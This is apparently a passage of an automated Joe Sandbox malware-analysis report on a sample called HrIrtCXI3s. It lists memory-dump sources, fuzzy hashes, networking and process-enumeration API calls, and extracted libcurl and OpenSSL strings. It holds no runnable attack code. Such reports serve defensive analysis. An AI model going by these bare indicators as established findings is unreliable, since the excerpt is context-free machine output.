                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: 0a485b8c76018f10d8951c776425d288153d47bf22b86291deebbe4023dc7ee7
                                                      • Instruction ID: 971849947d020690e09dc8e28340547fba22b2a7b3d5774f41cc86076a546f16
                                                      • Opcode Fuzzy Hash: 0a485b8c76018f10d8951c776425d288153d47bf22b86291deebbe4023dc7ee7
                                                      • Instruction Fuzzy Hash: 00F06D75109308AFD6209E01DC44D6BBBEDFFC9758F05456DF948232118270AE10CAB2
                                                      APIs
                                                      • socket.WS2_32(?,0059B280,00000000,-00000001,00000000,0059B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0059AF67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID:
                                                      • API String ID: 98920635-0
                                                      • Opcode ID: ce3b63192b6759bb91e2afe6fdf97d23db8f0ac38253d4705d8ad0bd08161a2e
                                                      • Instruction ID: 4b65d020088aa0da07a83ed352b0cc9186ec7edbbe92bc5e6b77bbda8f7a243f
                                                      • Opcode Fuzzy Hash: ce3b63192b6759bb91e2afe6fdf97d23db8f0ac38253d4705d8ad0bd08161a2e
                                                      • Instruction Fuzzy Hash: 03E0EDB6A092256BDA54DE18E8449ABF769EFC4B20F054A49B85467204C330AC5487F2
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f3350e4cf5aedb9438ab547a57020befb11687cdb77847597f7cbc2f3e29e566
                                                      • Instruction ID: dac8828b05d927ffc133495e2cc585d18713d265d78bf08c8ab5536730430f9e
                                                      • Opcode Fuzzy Hash: f3350e4cf5aedb9438ab547a57020befb11687cdb77847597f7cbc2f3e29e566
                                                      • Instruction Fuzzy Hash: 1DD022E7074002AE3AB2223237988795409E083031B31C923A482F794088DC0EE93472
                                                      APIs
                                                      • closesocket.WS2_32(?,00599422,?,?,?,?,?,?,?,?,?,?,?,w3X,00964C60,00000000), ref: 0059B04C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: 54d3a439ff2741fd4a9f036122d5b059d6c6fd98ef4c759e398b965d93e16086
                                                      • Instruction ID: a087ca8671ade547be901c608cc9e76f5a1b7bbf4f919cf8956b1b671c32c5ea
                                                      • Opcode Fuzzy Hash: 54d3a439ff2741fd4a9f036122d5b059d6c6fd98ef4c759e398b965d93e16086
                                                      • Instruction Fuzzy Hash: C3D0C23070020057EE208A54D988A477B2B7FC0710F28CB68E42C4A150E73BCD438602
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 1ac500922cf66812950395678c1557462ede03c344d22b8ef23b3b5073ff0ab1
                                                      • Instruction ID: 13202b2ff95511cb303288b3a60aab9819553ad0825cb77751d575b5da79b223
                                                      • Opcode Fuzzy Hash: 1ac500922cf66812950395678c1557462ede03c344d22b8ef23b3b5073ff0ab1
                                                      • Instruction Fuzzy Hash: 91C022E304100E7A6B213A602B908FA211CA883170B32CA28A840A7100988C084C10A2
                                                      APIs
                                                      • ioctlsocket.WS2_32(?,8004667E,?,?,0050AF56,?,00000001), ref: 005367FC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocket
                                                      • String ID:
                                                      • API String ID: 3577187118-0
                                                      • Opcode ID: d1d5ed4f6a47e81d89fa6b4cf4b82b8cfd4be20f92a6c33ae2d4cda43825abdd
                                                      • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                      • Opcode Fuzzy Hash: d1d5ed4f6a47e81d89fa6b4cf4b82b8cfd4be20f92a6c33ae2d4cda43825abdd
                                                      • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016659264.00000000071F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71f0000_HrIrtCXI3s.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016877440.00000000072A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72a0000_HrIrtCXI3s.jbxd
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                      • API String ID: 0-1371176463
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $d$nil)
                                                      • API String ID: 0-394766432
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                      • API String ID: 0-122532811
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                      • API String ID: 0-3977460686
                                                      • Opcode ID: e0c573f93923fce01219c83155566e85e528291038914b371925d247f90015b8
                                                      • Instruction ID: 2039e90346475f1a4340e817e10700a1792e636c79f6f869041a5f6ddbdf4570
                                                      • Opcode Fuzzy Hash: e0c573f93923fce01219c83155566e85e528291038914b371925d247f90015b8
                                                      • Instruction Fuzzy Hash: A3327B71A083814BC7209F2A9C4131B77D6ABD1322F054B2FE9A59B3D1E73CD946878B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                      • API String ID: 0-1914377741
                                                      • Opcode ID: 6021ed12df698bfdad794bb9e99378ad7fe1fe101123b9c026e0aa4763423496
                                                      • Instruction ID: f3f17550cff9dddefdcc5ef4c1b69e4d9ee4d58d85a8550fd95da3f5e76f40ff
                                                      • Opcode Fuzzy Hash: 6021ed12df698bfdad794bb9e99378ad7fe1fe101123b9c026e0aa4763423496
                                                      • Instruction Fuzzy Hash: 89724B30A08B459FE7218A28C5457B777D2AF91344F08861EEF845B393E77ED885C78A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                      • API String ID: 0-2058201250
                                                      • Opcode ID: c69d4674fd4b291b06ac50c15de76f340fb70e1c893e9724ecbd6a8ca57d9232
                                                      • Instruction ID: 8cd8c691b81715e357371b879ea27a2e9b7553df5bfec88d68751c3f8df10e0d
                                                      • Opcode Fuzzy Hash: c69d4674fd4b291b06ac50c15de76f340fb70e1c893e9724ecbd6a8ca57d9232
                                                      • Instruction Fuzzy Hash: DC61DBA5A0830167EB14B624AC57B3B7AD9BBD5344F08483DFC4AA6292FA71D9148353
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                      • API String ID: 0-3476178709
                                                      • Opcode ID: 98f12ba406b35f373f7c01b2f71d7c205a596b4cf734839da1a9634deb74b0cc
                                                      • Instruction ID: f04b2b8355ab723081dddddae4a65090683ee780a1006e6edb626d100f2903b0
                                                      • Opcode Fuzzy Hash: 98f12ba406b35f373f7c01b2f71d7c205a596b4cf734839da1a9634deb74b0cc
                                                      • Instruction Fuzzy Hash: C631A962B54A8536F728010EDC46F3E005BD3C5B1AE6AC63FFA069B2C1E8F95D05416D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                      • API String ID: 0-2550110336
                                                      • Opcode ID: 5941bb32d94d810fefbd718504379dbad183628b5568c9d026d73dfe9c0263d8
                                                      • Instruction ID: 842346dda3cdba92699d40578b11c68536d496e90b37896d6c7403a6cf5c2670
                                                      • Opcode Fuzzy Hash: 5941bb32d94d810fefbd718504379dbad183628b5568c9d026d73dfe9c0263d8
                                                      • Instruction Fuzzy Hash: 30323931748302BBEF20BB149C46FAA779BAF56B04F24891CF9845EAC2D771DA41C746
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$;$?$?$xn--$xn--
                                                      • API String ID: 0-543057197
                                                      • Opcode ID: 70bac28fe5fae847f37e1313a2e4e4f5646d17715156fad145f51bf8db34e111
                                                      • Instruction ID: 8712b55b01a6fbe9d542636e2515cf9c4b937dcddf7d3cf7e576e31c4484d765
                                                      • Opcode Fuzzy Hash: 70bac28fe5fae847f37e1313a2e4e4f5646d17715156fad145f51bf8db34e111
                                                      • Instruction Fuzzy Hash: FA22C1B2A14302ABEF209B24DC45B6F7AD8BF95348F04493CF85AD7292E775D904C792
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 0-2555271450
                                                      • Opcode ID: 17eeb651e5c0b83595601efded82bb87b5574756d49166898afa2e002e894986
                                                      • Instruction ID: c733cbb0aebde59bfcedf02a678220b89a47b0e3b0603c93efb0fe8a1a2d4218
                                                      • Opcode Fuzzy Hash: 17eeb651e5c0b83595601efded82bb87b5574756d49166898afa2e002e894986
                                                      • Instruction Fuzzy Hash: 4FC26B31608341CFC714CE28C4A066AB7E2FFC9754F16892FE8999B355D738ED468B86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 0-2555271450
                                                      • Opcode ID: 4064fae3b5a9b3a1be3d34140ec5b8ef080134768f89f1073e2b61c8f8b284cc
                                                      • Instruction ID: d3ce1931ecd297972ed403574b7f5d414d703c11b151531bc48c4ea3b2c08404
                                                      • Opcode Fuzzy Hash: 4064fae3b5a9b3a1be3d34140ec5b8ef080134768f89f1073e2b61c8f8b284cc
                                                      • Instruction Fuzzy Hash: E882A071A083019FD724DE19C8A172BB7E1AFD5724F148A2FF89A9B391D734DC098B46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: default$login$macdef$machine$netrc.c$password
                                                      • API String ID: 0-1043775505
                                                      • Opcode ID: a197cb49882c8dc2339bad773dfe5df0c0378ff5c7865fdb0caf3b56ef5fe31c
                                                      • Instruction ID: e415e516237d52252a30e976009bcf2b6a51de32b2d5910a457c5dfbcce1f429
                                                      • Opcode Fuzzy Hash: a197cb49882c8dc2339bad773dfe5df0c0378ff5c7865fdb0caf3b56ef5fe31c
                                                      • Instruction Fuzzy Hash: 90E12570908341BBE7219F21D89676BBFD0BF81349F588C2CF88557282E3B9D948C792
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                      • API String ID: 0-2839762339
                                                      • Opcode ID: a0bcdbc8f9c3defca0ff1ef89acc15c456b9483d6a5ba5d624ebeb607295de47
                                                      • Instruction ID: 88b4f2da27c6c151ad339e75691fd8d0335b036811bcf8b68219590aff704919
                                                      • Opcode Fuzzy Hash: a0bcdbc8f9c3defca0ff1ef89acc15c456b9483d6a5ba5d624ebeb607295de47
                                                      • Instruction Fuzzy Hash: 1B02D4B1A083419FD7219F248841B6BB7E4FF54356F14486DED89D7282EB70E90CC792
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                      • API String ID: 0-3285806060
                                                      • Opcode ID: 8a889101e951707510e1e0bf480734b522f67f52962f6df049ea0b8307e9b5a9
                                                      • Instruction ID: 2d8420114395041d56bc757a5357690a703c4847343f2ca108fe75d416ed31ab
                                                      • Opcode Fuzzy Hash: 8a889101e951707510e1e0bf480734b522f67f52962f6df049ea0b8307e9b5a9
                                                      • Instruction Fuzzy Hash: 5CD1C272A093418BD724BE28D88177EBFD1BF91344F14892DECD9A7281EA349D44D7A2
                                                      Strings
